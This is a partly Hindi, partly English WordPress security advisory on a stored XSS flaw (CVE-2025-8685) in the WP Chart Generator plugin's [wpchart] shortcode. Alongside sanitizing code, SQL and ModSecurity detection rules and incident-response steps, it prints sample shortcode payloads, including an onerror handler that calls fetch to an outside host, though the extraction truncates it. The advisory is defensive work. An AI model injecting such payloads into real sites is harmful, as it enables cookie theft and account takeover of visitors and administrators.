| प्लगइन का नाम | WP चार्ट जनरेटर |
|---|---|
| कमजोरियों का प्रकार | प्रमाणित संग्रहीत XSS |
| CVE संख्या | CVE-2025-8685 |
| तात्कालिकता | कम |
| CVE प्रकाशन तिथि | 2025-08-11 |
| स्रोत URL | CVE-2025-8685 |
सुरक्षा सलाह: WP चार्ट जनरेटर (≤ 1.0.4) — प्रमाणित योगदानकर्ता द्वारा संग्रहीत XSS [wpchart] शॉर्टकोड के माध्यम से (CVE‑2025‑8685)
कार्यकारी सारांश
यह सलाह “WP Chart Generator” वर्डप्रेस प्लगइन (संस्करण ≤ 1.0.4) में एक संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS) सुरक्षा कमजोरी का वर्णन करती है, जिसे CVE‑2025‑8685 के रूप में ट्रैक किया गया है।.
रिपोर्ट की गई जानकारी में गंभीरता को निम्न-से-मध्यम माना गया है (CVSS वेक्टर ~6.5) क्योंकि शोषण के लिए एक प्रमाणित योगदानकर्ता खाता आवश्यक है। प्रकाशन के समय कोई आधिकारिक विक्रेता पैच नहीं है। यह सलाह तकनीकी विवरण, पहचान विधियाँ, अल्पकालिक शमन विकल्प, डेवलपर सुधार मार्गदर्शन, WAF/ModSecurity नियम उदाहरण, और एक अनुभवी हांगकांग सुरक्षा प्रैक्टिशनर के दृष्टिकोण से घटना प्रतिक्रिया चेकलिस्ट प्रदान करती है।.
यह कमजोरी क्या है?
- प्रभावित सॉफ़्टवेयर: WP चार्ट जनरेटर प्लगइन
- प्रभावित संस्करण: ≤ 1.0.4
- भेद्यता प्रकार: [wpchart] शॉर्टकोड के रेंडरिंग में संग्रहीत क्रॉस-साइट स्क्रिप्टिंग (XSS)
- आवश्यक विशेषाधिकार: योगदानकर्ता (या उच्च)
- प्रकाशित: 11 अगस्त 2025
- CVE: CVE‑2025‑8685
- आधिकारिक सुधार: प्रकाशन के समय कोई नहीं
प्लगइन अविश्वसनीय शॉर्टकोड विशेषताओं और/या आंतरिक सामग्री को सही सफाई और एस्केपिंग के बिना सीधे फ्रंट-एंड HTML/JS में रेंडर करता है। एक योगदानकर्ता स्क्रिप्ट फ़्रैगमेंट या इवेंट हैंडलर्स वाले तैयार [wpchart] शॉर्टकोड के साथ सामग्री बना सकता है। जब रेंडर किया जाता है, तो ब्राउज़र साइट के मूल में इंजेक्टेड जावास्क्रिप्ट को निष्पादित करता है।.
यह क्यों महत्वपूर्ण है (प्रभाव विश्लेषण)
संग्रहीत XSS उच्च जोखिम में रहता है, भले ही प्रारंभिक पहुंच के लिए निम्न विशेषाधिकार की आवश्यकता हो। मुख्य प्रभाव:
- स्थायी पेलोड्स प्रत्येक बार निष्पादित होते हैं जब आगंतुक पृष्ठ को देखते हैं, जिससे जोखिम बढ़ता है।.
- निष्पादित जावास्क्रिप्ट पृष्ठ के मूल विशेषाधिकारों के साथ चलता है: यह कुकीज़ चुराने का प्रयास कर सकता है (यदि HttpOnly नहीं है), लॉगिन किए गए उपयोगकर्ताओं की ओर से क्रियाएँ कर सकता है, फ़िशिंग UI प्रदर्शित कर सकता है या आगंतुकों को पुनर्निर्देशित कर सकता है, और आगे के दुर्भावनापूर्ण संसाधनों (शोषण श्रृंखलाएँ, लोडर्स, क्रिप्टोमाइनर्स) को लोड कर सकता है।.
- कई साइटें योगदानकर्ता खातों की अनुमति देती हैं (जैसे, बहु-लेखक ब्लॉग, सदस्यता साइटें), इसलिए एक हमलावर ऐसे खातों को प्राप्त या बना सकता है।.
- संपादक/व्यवस्थापक खाते लॉग इन करते समय फ्रंट-एंड सामग्री को देखने से विशेषाधिकार वृद्धि या खाता अधिग्रहण का जोखिम बढ़ जाता है।.
शोषण कैसा दिखता है - उच्च-स्तरीय तकनीकी मार्गदर्शिका
प्लगइन एक [wpchart] शॉर्टकोड पंजीकृत करता है जो विशेषताएँ (लेबल, शीर्षक, डेटा एरे, रंग) स्वीकार करता है। यह कमजोरियां तब उत्पन्न होती हैं जब इन विशेषताओं को संदर्भ-सचेत एस्केपिंग के बिना HTML या इनलाइन जावास्क्रिप्ट में एम्बेड किया जाता है।.
- एक हमलावर एक योगदानकर्ता खाता प्राप्त करता है या बनाता है।.
- वे एक पोस्ट या पृष्ठ जोड़ते हैं जिसमें एक तैयार किया गया
[wpchart]शॉर्टकोड होता है जिसमें विशेषताएँ या आंतरिक सामग्री होती है जिसमें स्क्रिप्ट के टुकड़े या इवेंट हैंडलर होते हैं।. - पेलोड डेटाबेस में संग्रहीत होता है। जब पृष्ठ परोसा जाता है, तो ब्राउज़र इंजेक्टेड मार्कअप या स्क्रिप्ट को पार्स करता है और इसे निष्पादित करता है।.
- कोई भी आगंतुक (लॉग इन किए गए संपादकों/व्यवस्थापकों सहित) पेलोड को ट्रिगर कर सकता है।.
चित्रात्मक पेलोड (सार्वजनिक साइटों पर लागू न करें):
[wpchart title=""]</code></pre>
<pre><code>[wpchart data='[{"label":"<img src="x" onerror="fetch(\"https:>","value":10}]']</code></pre>
<p>मूल कारण बिना एस्केपिंग या सत्यापन के HTML/JS संदर्भों में अविश्वसनीय इनपुट को रेंडर करना है।.</p>
</section>
<section>
<h2 id="exploitation-scenarios-and-who-is-at-risk">शोषण परिदृश्य और कौन जोखिम में है</h2>
<ul>
<li>साइटें जो योगदानकर्ताओं को सामग्री बनाने की अनुमति देती हैं (सदस्यता या बहु-लेखक साइटें)।.</li>
<li>साइटें जिनमें सामाजिक पंजीकरण, थोक में आयातित लेखक, या कमजोर खाता नियंत्रण हैं।.</li>
<li>साइटें जहां संपादक/व्यवस्थापक प्रमाणीकरण के दौरान फ्रंट-एंड सामग्री का पूर्वावलोकन या दृश्य करते हैं।.</li>
<li>सार्वजनिक आगंतुक और ग्राहक प्रभावित हो सकते हैं (गोपनीयता और प्रतिष्ठा को नुकसान)।.</li>
<li>वाणिज्यिक साइटें संभावित चेकआउट प्रवाह में छेड़छाड़ के कारण विशेष रूप से संवेदनशील होती हैं।.</li>
</ul>
</section>
<section>
<h2 id="detection-how-to-find-vulnerable-or-exploited-instances">पहचान - कमजोर या शोषित उदाहरणों को कैसे खोजें</h2>
<p>पोस्ट, पृष्ठ और मेटा के लिए खोजें <code>[wpchart]</code> उदाहरण और स्क्रिप्ट-जैसे अंश।.</p>
<h3 id="wp-cli">WP-CLI</h3>
<pre><code># 'wpchart' के लिए पोस्ट और पृष्ठ खोजें'
</code></pre>
<h3 id="sql">SQL</h3>
<pre><code>-- wpchart शॉर्टकोड के लिए post_content खोजें;
</code></pre>
<p>संदिग्ध टोकन की तलाश करें: <code><script</code>, <code>onerror=</code>, <code>onload=</code>, <code>javascript:</code>, <code>document.cookie</code>, <code>fetch(</code>, and encoded equivalents (e.g., <code><script></code>, <code>%3Cscript%3E</code>).</p>
<pre><code>SELECT ID, post_title, post_content
FROM wp_posts
WHERE post_content REGEXP '(?i)(<script|onerror=|javascript:|document.cookie|fetch\\()';
</code></pre>
<p>Also search postmeta and plugin options where chart configurations may be stored:</p>
<pre><code>SELECT post_id, meta_key, meta_value
FROM wp_postmeta
WHERE meta_value LIKE '%wpchart%'
OR meta_value REGEXP '(?i)(<script|onerror=|javascript:|document.cookie|fetch\\()';
</code></pre>
<p>Examine webserver logs for POSTs creating/updating content and for outbound requests to suspicious domains originating from page views.</p>
</section>
<section>
<h2 id="short-term-mitigations-site-owners-and-admins">Short-term mitigations (site owners and admins)</h2>
<p>If an immediate vendor patch is unavailable, take the following actions to reduce exposure:</p>
<ol>
<li><strong>Remove or deactivate the plugin (preferred):</strong> If chart functionality is not required immediately, deactivate and remove the plugin until fixed.</li>
<li><strong>Restrict Contributor accounts:</strong> Temporarily disable new registrations or change default role to Subscriber. Review contributors and suspend or reset passwords for suspicious accounts.</li>
<li><strong>Review content and remove malicious shortcodes:</strong> Search posts/pages and sanitize or remove any <code>[wpchart]</code> occurrences that include script-like patterns.</li>
<li><strong>Temporary server-side sanitizer (virtual patch):</strong> Override the shortcode with a safe handler to sanitize attributes and content. Example mu-plugin snippet:</li>
</ol>
<pre><code><?php
// mu-plugin/wpchart-sanitizer.php
if ( ! function_exists( 'wpchart_sanitized_handler' ) ) {
function wpchart_sanitized_handler( $atts = [], $content = '' ) {
// Basic attribute sanitization example
$atts = array_map( 'sanitize_text_field', (array) $atts );
// whitelist numeric attributes
if ( isset( $atts['width'] ) ) {
$atts['width'] = intval( $atts['width'] );
}
if ( isset( $atts['height'] ) ) {
$atts['height'] = intval( $atts['height'] );
}
// sanitize content using a safe allowlist
$content = wp_kses( $content, array(
'a' => array( 'href' => true, 'title' => true ),
'span' => array( 'class' => true ),
) );
// Build safe output (example: escaped)
$title = isset( $atts['title'] ) ? esc_html( $atts['title'] ) : '';
return '<div class="wpchart-safe" data-config="' . esc_attr( json_encode( $atts ) ) . '">' . $title . $content . '</div>';
}
// Remove original shortcode if registered and register safe handler
remove_shortcode( 'wpchart' );
add_shortcode( 'wpchart', 'wpchart_sanitized_handler' );
}
?>
</code></pre>
<p>Notes: place this as an mu-plugin so it loads early. This is a temporary mitigation to neutralize stored payloads before rendering.</p>
<ol start="5">
<li><strong>Harden browser-side controls:</strong> Implement a Content Security Policy (CSP) that blocks inline scripts and restricts script sources. Example header:
<pre><code>Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.example.com; object-src 'none'; base-uri 'self'; frame-ancestors 'none'</code></pre>
<p> Also ensure cookies use Secure and HttpOnly flags and consider SameSite settings.</li>
<li><strong>Deploy rule-based request filters:</strong> Use host-level or application-layer filters to block content submissions containing script-like payloads targeted at the <code>[wpchart]</code> shortcode (examples below).</li>
</ol>
</section>
<section>
<h2 id="waf-modsecurity-rules-examples">WAF / ModSecurity rules (examples)</h2>
<p>Below are example ModSecurity rules to block common XSS patterns related to <code>[wpchart]</code>. Test thoroughly before applying to production.</p>
<pre><code># ModSecurity example
SecRule REQUEST_URI|REQUEST_BODY "@rx \[wpchart[^\]]*(<script|onerror=|onload=|javascript:|document\.cookie|fetch\()" \
"id:1001001,phase:2,deny,log,status:403,msg:'Blocked stored XSS attempt in wpchart shortcode',severity:2"
</code></pre>
<pre><code>SecRule REQUEST_METHOD "^POST$" \
"chain, id:1001002,phase:2,deny,log,status:403,msg:'Blocked POST containing script tag',severity:2"
SecRule REQUEST_BODY "@rx <\s*script\b" "t:none"
</code></pre>
<pre><code>SecRule REQUEST_BODY "@rx \[wpchart[^\]]*(onerror|onload|javascript:|document\.cookie|window\.location)" \
"id:1001003,phase:2,deny,log,status:403,msg:'Blocked suspicious attribute inside wpchart',severity:2"
</code></pre>
<pre><code>SecRule REQUEST_URI "@rx /wp-admin/post.php|/wp-admin/post-new.php" \
"phase:2,id:1001004,deny,log,status:403,msg:'Blocked potential XSS payload in post content',chain"
SecRule REQUEST_BODY "@rx (onerror|onload|<\s*script|javascript:|document\.cookie|fetch\()" "t:none"
</code></pre>
<p>Guidance:</p>
<ul>
<li>Target rules narrowly (match the <code>[wpchart]</code> token and plugin-specific meta keys) to reduce false positives.</li>
<li>Log and run in monitor/report-only mode initially to tune rules, then switch to deny once confidence is established.</li>
<li>Combine with rate-limiting to mitigate repeated attempts.</li>
</ul>
</section>
<section>
<h2 id="recommended-permanent-code-fixes-for-plugin-developers">Recommended permanent code fixes for plugin developers</h2>
<p>Developers should address the root causes with robust validation and context-aware escaping:</p>
<ol>
<li><strong>Sanitize input on accept:</strong> Use typed validation for numeric fields (intval(), floatval()), use <code>sanitize_text_field()</code> for simple strings, and parse & validate JSON configuration server-side.</li>
<li><strong>Escape output per context:</strong> Use <code>esc_attr()</code> for attribute values, <code>esc_html()</code> for text nodes and <code>wp_kses()</code> with strict allowlists for any permitted HTML. Avoid echoing unchecked input into inline scripts.</li>
<li><strong>Prefer data-* attributes:</strong> Emit sanitized JSON inside a data attribute via <code>wp_json_encode()</code> and let a vetted client-side script consume that data safely.</li>
<li><strong>Enforce capability checks and nonces:</strong> For any AJAX endpoints or admin UI that stores content, enforce <code>current_user_can()</code> and <code>check_admin_referer()</code>.</li>
<li><strong>Example safe shortcode output pattern:</strong></li>
</ol>
<pre><code>function wpchart_safe_shortcode( $atts = [], $content = '' ) {
$atts = shortcode_atts( array(
'title' => '',
'width' => 600,
'height' => 400,
'data' => '[]',
), $atts, 'wpchart' );
// Sanitize / validate
$safe = array(
'title' => sanitize_text_field( $atts['title'] ),
'width' => intval( $atts['width'] ),
'height' => intval( $atts['height'] ),
);
// For JSON data: decode and validate structure; re-encode safely
$data = json_decode( wp_unslash( $atts['data'] ), true );
if ( ! is_array( $data ) ) {
$data = array();
}
// Validate each data point (example)
$validated_data = array();
foreach ( $data as $row ) {
$label = isset( $row['label'] ) ? sanitize_text_field( $row['label'] ) : '';
$value = isset( $row['value'] ) ? floatval( $row['value'] ) : 0;
$validated_data[] = array( 'label' => $label, 'value' => $value );
}
// Output: store config safely in data attribute and escape it for HTML
$cfg = wp_json_encode( array(
'title' => $safe['title'],
'width' => $safe['width'],
'height'=> $safe['height'],
'data' => $validated_data,
) );
return sprintf(
'<div class="wpchart" data-wpchart="%s"></div>',
esc_attr( $cfg )
);
}
</code></pre>
<p>Do not build inline scripts that interpolate user-provided values. Use external, audited JS that reads sanitized <code>data-*</code> attributes.</p>
</section>
<section>
<h2 id="incident-response-if-you-suspect-exploitation">Incident response: If you suspect exploitation</h2>
<ol>
<li>Take affected page(s) offline (unpublish) or put the site into maintenance mode if widespread.</li>
<li>Identify and remove malicious posts, shortcodes or plugin meta entries (see detection section).</li>
<li>Change passwords for Contributor+ accounts and administrators. Consider forcing password resets for all users if compromise is suspected.</li>
<li>Inspect server logs for suspicious activity and block attacker IPs at host or WAF level.</li>
<li>Run a full malware scan and file integrity check. Look for added admin users, unexpected scheduled tasks, or backdoors.</li>
<li>Rotate API keys, integration tokens, and any stored credentials that could be exposed.</li>
<li>If admin accounts were compromised, audit site settings and restore from a known-clean backup if necessary.</li>
<li>Notify affected users if user data may have been exposed, following applicable privacy and breach-notification law.</li>
<li>After cleanup, re-enable stricter registration policies, enforce two-factor authentication for elevated roles, apply CSP and secure HTTP headers.</li>
<li>Monitor for re-injection attempts and maintain long-term detection rules.</li>
</ol>
</section>
<section>
<h2 id="monitoring-and-detection-after-cleanup">Monitoring and detection after cleanup</h2>
<ul>
<li>Enable logging for request filters and review blocked events.</li>
<li>Set up content integrity checks to detect reappearance of suspicious <code>[wpchart]</code> shortcodes or injected script tags.</li>
<li>Schedule weekly scans and manual reviews for a period after the incident.</li>
<li>Deploy updates in a staging environment and validate fixes before production rollout.</li>
</ul>
</section>
<section>
<h2 id="hardening-recommendations-to-reduce-xss-risk-site-wide">Hardening recommendations to reduce XSS risk site-wide</h2>
<ul>
<li>Apply principle of least privilege: limit Contributor role usage and consider custom roles with reduced capabilities.</li>
<li>Require editorial review workflows: contributors should submit for review rather than publish directly.</li>
<li>Enforce strong passwords and two-factor authentication for editors and administrators.</li>
<li>Restrict untrusted user registration or require administrator approval.</li>
<li>Use CSP in report-only mode first to identify issues, then enforce once safe.</li>
<li>Ensure session cookies are HttpOnly and Secure; consider SameSite settings.</li>
<li>Keep WordPress core and plugins updated and perform periodic security audits.</li>
</ul>
</section>
<section>
<h2 id="a-short-note-for-developers-test-for-xss-during-qa">A short note for developers: test for XSS during QA</h2>
<ul>
<li>Include input fuzzing for shortcode attributes and stored values.</li>
<li>Automate tests to detect unescaped outputs in HTML and JS contexts.</li>
<li>Review third-party chart libraries and ensure data is passed safely (prefer data-* + JSON + validated client-side rendering).</li>
<li>Maintain a clear disclosure policy and a public changelog to accelerate coordinated fixes when issues are reported.</li>
</ul>
</section>
<section>
<h2 id="frequently-asked-questions-faq">Frequently asked questions (FAQ)</h2>
<h3 id="q-if-i-am-not-using-the-wp-chart-generator-plugin-am-i-affected">Q: If I am not using the WP Chart Generator plugin, am I affected?</h3>
<p>No. This advisory concerns specifically the WP Chart Generator plugin (≤ 1.0.4). However, the general guidance applies to any plugin that renders unescaped user input.</p>
<h3 id="q-if-an-attacker-needs-a-contributor-account-is-my-site-safe">Q: If an attacker needs a Contributor account, is my site safe?</h3>
<p>Not necessarily. Many sites allow registrations that map to low-privilege roles; weak or reused passwords are a common vector. Treat user registration as a potential risk and limit privileges where possible.</p>
<h3 id="q-will-a-content-security-policy-fully-prevent-exploitation">Q: Will a Content Security Policy fully prevent exploitation?</h3>
<p>A properly configured CSP substantially reduces the impact of many XSS payloads by blocking inline scripts and restricting script origins, but CSP should complement input sanitization and server-side protections — it is not a substitute for correct coding.</p>
<h3 id="q-is-the-issue-already-patched">Q: Is the issue already patched?</h3>
<p>At the time of this advisory, no official patched release was available. Follow the plugin's release channel for updates and apply the mitigations listed here until a patch is published.</p>
</section>
<section>
<h2 id="closing-thoughts">Closing thoughts</h2>
<p>Stored XSS like CVE‑2025‑8685 can have persistent and far-reaching consequences. Although exploitation requires authenticated access, many realistic paths exist to obtain contributor-level permissions. Treat unescaped shortcode attributes and plugin-rendered client-side scripts as high priority. Immediate actions: review and sanitize content, restrict Contributor capabilities, apply temporary sanitization or request-filtering, and consider deactivating the plugin until it is fixed. Plugin authors should implement strict input validation and context-aware escaping for all shortcode attributes and stored content.</p>
<p>If you lack in-house capability to perform scans or apply mitigations, engage a trusted security practitioner or managed service to assist with detection, virtual patching and recovery steps. Maintain careful logs of remediation actions and preserve forensic artifacts if a compromise is suspected.</p>
<p style="margin-top:12px;">Stay vigilant. Review user-generated content regularly and reduce the blast radius of low-privilege user accounts.</p>
</section>
<footer style="margin-top:28px;color:#666;font-size:0.95em;">
<p>Prepared by a Hong Kong security expert. CVE record: <a href="https://www.cve.org/CVERecord/SearchResults?query=CVE-2025-8685" target="_blank" rel="noopener noreferrer">CVE-2025-8685</a>.</p>
</footer>
<p></body><br />
</html></p>
</div>
<section class="post-tags"><ul><li><h5 class="title-tags">टैग:</h5></li><li><a href="https://wp-security.org/hi/tag/wordpress-security/" rel="tag">WordPress Security</a></li></ul></section> <div class="pk-share-buttons-wrap pk-share-buttons-layout-default pk-share-buttons-scheme-bold-bg pk-share-buttons-has-counts pk-share-buttons-has-total-counts pk-share-buttons-after-post pk-share-buttons-mode-php pk-share-buttons-mode-rest" data-post-id="803" data-share-url="https://wp-security.org/hi/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" >
<div class="pk-share-buttons-total pk-share-buttons-total-no-count">
<div class="pk-share-buttons-count cs-font-primary">0 Shares:</div>
</div>
<div class="pk-share-buttons-items">
<div class="pk-share-buttons-item pk-share-buttons-facebook pk-share-buttons-no-count" data-id="facebook">
<a href="https://www.facebook.com/sharer.php?u=https://wp-security.org/hi/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="pk-share-buttons-link" target="_blank">
<i class="pk-share-buttons-icon pk-icon pk-icon-facebook"></i>
<span class="pk-share-buttons-label pk-font-primary">साझा करें</span>
<span class="pk-share-buttons-count pk-font-secondary">0</span>
</a>
</div>
<div class="pk-share-buttons-item pk-share-buttons-twitter pk-share-buttons-no-count" data-id="twitter">
<a href="https://x.com/share?&text=%3Ctrp-post-container%20data-trp-post-id%3D%27803%27%3EHong%20Kong%20Security%20NGO%20warns%20WordPress%20XSS%28CVE20258685%29%3C%2Ftrp-post-container%3E&url=https://wp-security.org/hi/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="pk-share-buttons-link" target="_blank">
<i class="pk-share-buttons-icon pk-icon pk-icon-twitter"></i>
<span class="pk-share-buttons-label pk-font-primary">ट्वीट</span>
<span class="pk-share-buttons-count pk-font-secondary">0</span>
</a>
</div>
<div class="pk-share-buttons-item pk-share-buttons-pinterest pk-share-buttons-no-count" data-id="pinterest">
<a href="https://pinterest.com/pin/create/bookmarklet/?url=https://wp-security.org/hi/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/&media=https://wp-security.org/wp-content/uploads/2025/08/2025-08-11CVE20258685Wp-chart-generator-1024x576.jpg" class="pk-share-buttons-link" target="_blank">
<i class="pk-share-buttons-icon pk-icon pk-icon-pinterest"></i>
<span class="pk-share-buttons-label pk-font-primary">इसे पिन करें</span>
<span class="pk-share-buttons-count pk-font-secondary">0</span>
</a>
</div>
</div>
</div>
<section class="post-author">
<div class="authors-compact">
<div class="author-wrap">
<div class="author">
<div class="author-avatar">
<a href="https://wp-security.org/hi/author/wp-security/" rel="author">
<img alt='' src='https://secure.gravatar.com/avatar/16bf83a02c7c3aa39247769e866366c2ea8ccfb8bd88a16ef3ac35925a1da888?s=120&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/16bf83a02c7c3aa39247769e866366c2ea8ccfb8bd88a16ef3ac35925a1da888?s=240&d=mm&r=g 2x' class='avatar avatar-120 photo' height='120' width='120' decoding='async'/> </a>
</div>
<div class="author-description">
<h5 class="title-author">
<span class="fn">
<a href="https://wp-security.org/hi/author/wp-security/" rel="author">
WP Security Vulnerability Report </a>
</span>
</h5>
<p class="note"></p>
</div>
</div>
</div>
</div>
</section>
<div id="disqus_thread"></div>
</div>
</div>
</article>
<div class="post-prev-next">
<a class="link-item prev-link" href="https://wp-security.org/hi/vulnerability-database/gmap-venturit-stored-xss-alert-for-hkcve20258568/">
<div class="link-content">
<div class="link-label">
<span class="link-arrow"></span><span class="link-text"> — पिछला लेख</span>
</div>
<h2 class="entry-title">
GMap Venturit Stored XSS Alert for HK(CVE20258568) </h2>
</div>
</a>
<a class="link-item next-link" href="https://wp-security.org/hi/vulnerability-database/hong-kong-security-wordpress-stock-quotes-xsscve20258688/">
<div class="link-content">
<div class="link-label">
<span class="link-text">अगला लेख — </span><span class="link-arrow"></span>
</div>
<h2 class="entry-title">
Hong Kong Security WordPress Stock Quotes XSS(CVE20258688) </h2>
</div>
</a>
</div>
<section class="post-archive archive-related">
<div class="archive-wrap">
<div class="title-block-wrap">
<h5 class="title-block">
आपको यह भी पसंद आ सकता है </h5>
</div>
<div class="archive-main archive-list archive-heading-small archive-borders-enabled archive-shadow-enabled archive-scale-enabled">
<article class="entry-without-preview post-2464 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/hi/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/hi/vulnerability-database/hong-kong-security-alert-csrf-in-xclonercve202511759/" rel="bookmark">Hong Kong Security Alert CSRF in XCloner(CVE202511759)</a></h2><ul class="post-meta"><li class="meta-date">फ़रवरी 2, 2026</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
Cross Site Request Forgery (CSRF) in WordPress XCloner Plugin </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-3793 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/hi/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/hi/vulnerability-database/hong-kong-cybersecurity-alert-xss-in-fyydcve20264084/" rel="bookmark">Hong Kong Cybersecurity Alert XSS in Fyyd(CVE20264084)</a></h2><ul class="post-meta"><li class="meta-date">मार्च 23, 2026</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
Cross Site Scripting (XSS) in WordPress fyyd podcast shortcodes Plugin </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-3195 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/hi/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/hi/vulnerability-database/hong-kong-security-alert-privilege-escalationcve202627541/" rel="bookmark">Hong Kong Security Alert Privilege Escalation(CVE202627541)</a></h2><ul class="post-meta"><li class="meta-date">फ़रवरी 22, 2026</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
Privilege Escalation in WordPress Wholesale Suite Plugin </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-1984 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/hi/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/hi/vulnerability-database/security-advisory-mapsvg-arbitrary-file-uploadcve202568562/" rel="bookmark">Security Advisory MapSVG Arbitrary File Upload(CVE202568562)</a></h2><ul class="post-meta"><li class="meta-date">दिसम्बर 26, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
Arbitrary File Upload in WordPress MapSVG Plugin </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-3924 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/hi/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/hi/vulnerability-database/leadconnector-access-vulnerability-endangers-hong-kong-sitescve20261890/" rel="bookmark">LeadConnector Access Vulnerability Endangers Hong Kong Sites(CVE20261890)</a></h2><ul class="post-meta"><li class="meta-date">मार्च 30, 2026</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
Broken Access Control in WordPress LeadConnector Plugin </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-1455 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/hi/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/hi/vulnerability-database/security-advisory-ticketspot-stored-cross-site-scriptingcve20259875/" rel="bookmark">Security Advisory TicketSpot Stored Cross Site Scripting(CVE20259875)</a></h2><ul class="post-meta"><li class="meta-date">अक्टूबर 4, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
WordPress TicketSpot plugin <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting vulnerability </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
</div>
</div>
</section>
</main>
</div><!-- .content-area -->
</div><!-- .main-content -->
</div><!-- .cs-container -->
</div><!-- .site-content -->
<footer id="colophon" class="site-footer">
<div class="footer-subscribe">
<div class="cs-container">
<div class="subscribe-wrap">
</div>
</div>
</div>
<div class="footer-info">
<div class="cs-container">
<div class="site-info">
<div class="footer-col-info">
<span class="site-title footer-title" href="https://wp-security.org/hi/" rel="home">
<img src="https://wp-security.org/wp-content/uploads/2025/08/WP-Security-logo-1-e1754494371106.png" alt="WP Security" > </span>
<div class="footer-copyright">
© 2025 WP-Security.org Disclaimer: WP-Security.org is an independent, non-profit NGO community committed to sharing WordPress security news and information. We are not affiliated with WordPress, its parent company, or any related entities. All trademarks are the property of their respective owners. </div>
</div>
</div>
</div>
</div>
</footer>
</div>
</div><!-- .site-inner -->
</div><!-- .site -->
<template id="tp-language" data-tp-language="hi_IN"></template><script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/hi/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/squaretype/*","/hi/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<a href="#top" class="pk-scroll-to-top">
<i class="pk-icon pk-icon-up"></i>
</a>
<div class="pk-mobile-share-overlay">
</div>
<script type="text/javascript">
var _paq = _paq || [];
_paq.push(['setCustomDimension', 1, '{"ID":3,"name":"WP Security Vulnerability Report","avatar":"f7de7e299d4a4b4c92c6f2c2a29a7ca7"}']);
_paq.push(['trackPageView']);
(function () {
var u = "https://analytics2.wpmudev.com/";
_paq.push(['setTrackerUrl', u + 'track/']);
_paq.push(['setSiteId', '24942']);
var d = document, g = d.createElement('script'), s = d.getElementsByTagName('script')[0];
g.type = 'text/javascript';
g.async = true;
g.defer = true;
g.src = 'https://analytics.wpmucdn.com/matomo.js';
s.parentNode.insertBefore(g, s);
})();
</script>
